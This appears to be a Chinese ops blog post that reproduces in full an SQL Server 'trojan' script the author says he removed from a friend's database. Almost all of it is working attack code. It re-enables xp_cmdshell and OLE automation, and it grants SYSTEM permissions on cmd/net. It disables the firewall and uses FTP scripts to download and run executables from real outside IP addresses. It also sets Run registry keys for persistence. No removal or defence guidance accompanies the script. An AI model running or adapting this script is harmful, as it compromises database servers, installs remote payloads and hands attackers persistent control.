sql木马脚本

作者: 分类:运维搬砖 字数:44954 阅读:119
warning: 这篇文章距离上次修改已过566天,其中的内容可能已经有所变动。

发一段sql写的木马脚本,删除也很简单,就不写了。

昨天一朋友告诉我他的网站崩了,我登了他的服务器,没看到文件有什么异常,再看数据库,天啊,sql木马脚本!! 写这东西 的人还真有才,呵呵.不过我一下就把它删了.以下是脚本的全部源码,大家学习一下可以,千万不要拿来破坏哦,要不以后我不发这些源码类的东西了.
Powered By Error Q:302777528
go
use Master
If object_id('sp_dropextendedproc') is not null 
drop procedure sp_dropextendedproc

create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of function
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end

-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc

go

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;

go

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;

go

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ole Automation Procedures',1;RECONFIGURE;

go

use Master
If object_id('sp_dropextendedproc') is not null 
drop procedure sp_dropextendedproc

 

dbcc dropextendedproc ("xp_dirtree");
dbcc addextendedproc ("xp_dirtree","xpstar.dll");
dbcc dropextendedproc ("xp_regread");
dbcc addextendedproc ("xp_regread","xpstar.dll");
dbcc dropextendedproc ("xp_regwrite");
dbcc addextendedproc ("xp_regwrite","xpstar.dll");
dbcc dropextendedproc ("sp_OACreate");
dbcc addextendedproc ("sp_OACreate","odsole70.dll");
dbcc dropextendedproc ("sp_OAMethod");
dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'wbem\sr cmd.exe /e /g system:f'
declare @shell1 int exec sp_oacreate 'wscript.shell',@shell1 output exec sp_oamethod @shell1,'run',null,'wbem\sr net1.exe /e /g system:f'
declare @shell2 int exec sp_oacreate 'wscript.shell',@shell2 output exec sp_oamethod @shell2,'run',null,'wbem\sr net.exe /e /g system:f'
declare @shell3 int exec sp_oacreate 'wscript.shell',@shell3 output exec sp_oamethod @shell3,'run',null,'wbem\sp cmd.exe /e /g system:f'
declare @shell4 int exec sp_oacreate 'wscript.shell',@shell4 output exec sp_oamethod @shell4,'run',null,'wbem\sp net1.exe /e /g system:f'
declare @shell5 int exec sp_oacreate 'wscript.shell',@shell5 output exec sp_oamethod @shell5,'run',null,'wbem\sp net.exe /e /g system:f'
declare @shell6 int exec sp_oacreate 'wscript.shell',@shell6 output exec sp_oamethod @shell6,'run',null,'ws cmd.exe /e /g system:f'
declare @shell7 int exec sp_oacreate 'wscript.shell',@shell7 output exec sp_oamethod @shell7,'run',null,'ws net1.exe /e /g system:f'
declare @shell8 int exec sp_oacreate 'wscript.shell',@shell8 output exec sp_oamethod @shell8,'run',null,'ws net.exe /e /g system:f'
declare @shell9 int exec sp_oacreate 'wscript.shell',@shell9 output exec sp_oamethod @shell9,'run',null,'wbem\we cmd.exe /e /g system:f'
declare @shell10 int exec sp_oacreate 'wscript.shell',@shell10 output exec sp_oamethod @shell10,'run',null,'wbem\we net1.exe /e /g system:f'
declare @shell11 int exec sp_oacreate 'wscript.shell',@shell11 output exec sp_oamethod @shell11,'run',null,'wbem\we net.exe /e /g system:f'
declare @shell12 int exec sp_oacreate 'wscript.shell',@shell12 output exec sp_oamethod @shell12,'run',null,'wbem\xj cmd.exe /e /g system:f'
declare @shell13 int exec sp_oacreate 'wscript.shell',@shell13 output exec sp_oamethod @shell13,'run',null,'wbem\xj net1.exe /e /g system:f'
declare @shell14 int exec sp_oacreate 'wscript.shell',@shell14 output exec sp_oamethod @shell14,'run',null,'wbem\xj net.exe /e /g system:f'
declare @shell15 int exec sp_oacreate 'wscript.shell',@shell15 output exec sp_oamethod @shell15,'run',null,'drivers\vs cmd.exe /e /g system:f'
declare @shell16 int exec sp_oacreate 'wscript.shell',@shell16 output exec sp_oamethod @shell16,'run',null,'drivers\vs net1.exe /e /g system:f'
declare @shell17 int exec sp_oacreate 'wscript.shell',@shell17 output exec sp_oamethod @shell17,'run',null,'drivers\vs net.exe /e /g system:f'
declare @shell18 int exec sp_oacreate 'wscript.shell',@shell18 output exec sp_oamethod @shell18,'run',null,'cs cmd.exe /e /g system:f'
declare @shell19 int exec sp_oacreate 'wscript.shell',@shell19 output exec sp_oamethod @shell19,'run',null,'cs net1.exe /e /g system:f'
declare @shell20 int exec sp_oacreate 'wscript.shell',@shell20 output exec sp_oamethod @shell20,'run',null,'cs net.exe /e /g system:f'
declare @shell21 int exec sp_oacreate 'wscript.shell',@shell21 output exec sp_oamethod @shell21,'run',null,'drivers\vsx cmd.exe /e /g system:f'
declare @shell22 int exec sp_oacreate 'wscript.shell',@shell22 output exec sp_oamethod @shell22,'run',null,'drivers\vsx net1.exe /e /g system:f'
declare @shell23 int exec sp_oacreate 'wscript.shell',@shell23 output exec sp_oamethod @shell23,'run',null,'drivers\vsx net.exe /e /g system:f'
declare @shell24 int exec sp_oacreate 'wscript.shell',@shell24 output exec sp_oamethod @shell24,'run',null,'wbem\wbemfest cmd.exe /e /g system:f'
declare @shell25 int exec sp_oacreate 'wscript.shell',@shell25 output exec sp_oamethod @shell25,'run',null,'wbem\wbemfest net1.exe /e /g system:f'
declare @shell26 int exec sp_oacreate 'wscript.shell',@shell26 output exec sp_oamethod @shell26,'run',null,'wbem\wbemfest net.exe /e /g system:f'

go

exec xp_makecab 'C:\Windows\System\1.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\odsole70.dll'
exec xp_unpackcab 'C:\Windows\System\1.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\1.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\1.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\2.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\odsole70.dll'
exec xp_unpackcab 'C:\Windows\System\2.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\2.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\2.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\3.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\odsole70.dll'
exec xp_unpackcab 'C:\Windows\System\3.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\3.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\3.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\4.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xplog70.dll'
exec xp_unpackcab 'C:\Windows\System\4.Zip','C:\Windows\System',1
exec xp_makecab 'C:\Windows\System\5.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xplog70.dll'
exec xp_unpackcab 'C:\Windows\System\5.Zip','C:\Windows\System',1
exec xp_makecab 'C:\Windows\System\6.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xplog70.dll'
exec xp_unpackcab 'C:\Windows\System\6.Zip','C:\Windows\System',1
exec xp_makecab 'C:\Windows\System\7.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xpstar.dll'
exec xp_unpackcab 'C:\Windows\System\7.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\7.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\7.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\8.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xpstar.dll'
exec xp_unpackcab 'C:\Windows\System\8.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\8.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\8.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\9.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xpstar.dll'
exec xp_unpackcab 'C:\Windows\System\9.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\9.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\9.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1

go
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go

select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go

select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go

exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 58.218.202.35> cmd.txt&echo 123>> cmd.txt&echo 521>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit'

go
EXECUTE msdb.dbo.sp_help_alert @order_by = N'severity ASC, message_id ASC, database_name DESC'
go

declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net1 stop sharedaccess&echo open 58.218.202.35> cmd.txt&echo 123>> cmd.txt&echo 521>> cmd.txt&echo binary >> cmd.txt&echo get cao1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao1.exe&cao1.exe&del cmd.txt /q /f&exit"'

go

if(@@version like 'Microsoft SQL Server  2000%')

go
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))drop procedure sp_trace_setstatus
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))drop procedure xp_regwrite
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;

go
create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);

use master
go

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go


EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
go
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
go
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
go
EXEC sp_OASetProperty @ObjectToken
go

drop procedure sp_addextendedproc
go
drop procedure sp_oacreate
go
exec sp_dropextendedproc 'xp_cmdshell'
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go

drop procedure sp_addextendedproc
go
drop procedure sp_oacreate
go
exec sp_dropextendedproc 'xp_cmdshell'
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
dbcc dropextendedproc ("xp_cmdshell");
dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
dbcc dropextendedproc ("xp_dirtree");
dbcc addextendedproc ("xp_dirtree","xpstar.dll");
dbcc dropextendedproc ("xp_regread");
dbcc addextendedproc ("xp_regread","xpstar.dll");
dbcc dropextendedproc ("xp_regwrite");
dbcc addextendedproc ("xp_regwrite","xpstar.dll");
dbcc dropextendedproc ("sp_OACreate");
dbcc addextendedproc ("sp_OACreate","odsole70.dll");
dbcc dropextendedproc ("sp_OAMethod");
dbcc addextendedproc ("sp_OAMethod","odsole70.dll");

exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb70.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_dirtree,'xpstar70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar90.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_enumgroups,'xplog90.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar90.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_loginconfig,'xplog90.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar90.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar70.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar90.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole90.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole90.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'  
exec sp_addextendedproc sp_OAMethod,'odsole90.dll' 
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole90.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar90.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar70.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar90.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar70.dll'
exec sp_addextendedproc xp_regread,'xpstar90.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar70.dll'
exec sp_addextendedproc xp_regwrite,'xpstar90.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar70.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar90.dll'

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go

-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
GO
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go

exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\ftp.exe /e /t /g system:F';
go
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mcsql.exe'--
go

declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
drop procedure  xp_cmdshell
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit'
GO


exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 183.67.206.51  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit'
GO

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit'
GO

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
go
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
go
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
go
EXEC sp_OASetProperty @ObjectToken
go

drop procedure sp_addextendedproc
go
drop procedure sp_oacreate
go
exec sp_dropextendedproc 'xp_cmdshell'
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go

exec xp_cmdshell 'cmd.exe /c net stop sharedaccess&@echo open 183.67.206.51> cmd&@echo 123>> cmd&@echo 123>> cmd&@echo binary >> cmd&@echo get 123.exe C:\cmd.exe>> cmd&@echo bye >> cmd&ftp -s:cmd &C:\cmd.exe&del cmd /q /f&ping -n 3 127.0.0.1>nul&del C:\cmd.exe /f'
go

if(@@version like 'Microsoft SQL Server  2000%')
use master;
else
exec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;

go
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;

go
create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);

go
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
go

declare @sp_passwordo int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo out;exec sp_oamethod @sp_passwordo, 'copyfile',null,'c:\windows\system32\ma.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordod int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordod out;exec sp_oamethod @sp_passwordod, 'copyfile',null,'c:\windows\system32\cs.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordos int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordos out;exec sp_oamethod @sp_passwordos, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordode int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordode out;exec sp_oamethod @sp_passwordode, 'copyfile',null,'c:\windows\system32\ps.exe' ,'c:\windows\system32\ws.exe';
go

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\windows\system32\1025\run.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run [2 8 18]';
go


declare @sp_passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2 out;exec sp_oamethod @sp_passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4 out;exec sp_oamethod @sp_passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3 out;exec sp_oamethod @sp_passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\ws.exe';
go

declare @sp_passwordox int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordox out;exec sp_oamethod @sp_passwordox, 'copyfile',null,'c:\winnt\system32\ma.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodx out;exec sp_oamethod @sp_passwordodx, 'copyfile',null,'c:\winnt\system32\bsnr.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordosx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordosx out;exec sp_oamethod @sp_passwordosx, 'copyfile',null,'c:\winnt\system32\cacls.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodex int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodex out;exec sp_oamethod @sp_passwordodex, 'copyfile',null,'c:\winnt\system32\ps.exe' ,'c:\winnt\system32\ws.exe';
go

declare @sp_passwordo2x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2x out;exec sp_oamethod @sp_passwordo2x, 'copyfile',null,'c:\winnt\system32\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo4x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4x out;exec sp_oamethod @sp_passwordo4x, 'copyfile',null,'c:\winnt\system32\dllcache\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo3x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3x out;exec sp_oamethod @sp_passwordo3x, 'copyfile',null,'c:\winnt\system32\dllcache\cacls.exe' ,'c:\winnt\system32\ws.exe';
go

